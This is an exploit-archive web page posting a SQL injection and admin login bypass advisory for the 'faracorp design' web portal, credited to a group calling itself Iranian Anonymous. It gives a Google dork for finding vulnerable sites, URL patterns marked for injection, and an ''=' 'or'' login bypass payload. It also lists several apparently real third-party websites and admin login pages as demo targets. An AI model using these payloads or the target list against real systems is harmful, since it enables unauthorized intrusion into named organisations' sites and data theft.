Home / os / linux

Faracorp design Sql injection Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>faracorp design Sql injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>########################## # Exploit Title: faracorp design Sql injection Vulnerability # Google Dork : intext:"طراحی وب سایت و اجرا: پورتال هوشمند" # Date:2016-11-19 # Discovered By: Ormazd # We Are Iranian Anonymous # Home: Iranonymous.org # Version: all # Tested on : Win 10 ########################## ## DP ## hey . we have a security problem in the faracorp design This is a multiple problem of security 1- sql in page course_view.php 2- Admin page bypass #### Poc1 : http://www.Site.com/path/product/[inject here]/.html or http://www.Site.com/path/news/view/[inject here]/.html or http://www.Site.com/path/news/[inject here]/.html ... Demo: http://www.dsteel.ir/products/4/.html http://www.doudmanco.com/portal/news/view/5/.html http://www.vese.ir/news/63/.html #### Poc2: http://site.com/admin # Username : '=' 'or' # Password : '=' 'or' Demo: http://www.dsteel.ir/admin/login.php http://www.vese.ir/admin/login.php http://www.alborzmachineco.com/admin/login.php ############################# #Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN || And All Of Iranian Anonymous . # Discovered By: Ormazd</BODY></HTML>

 

TOP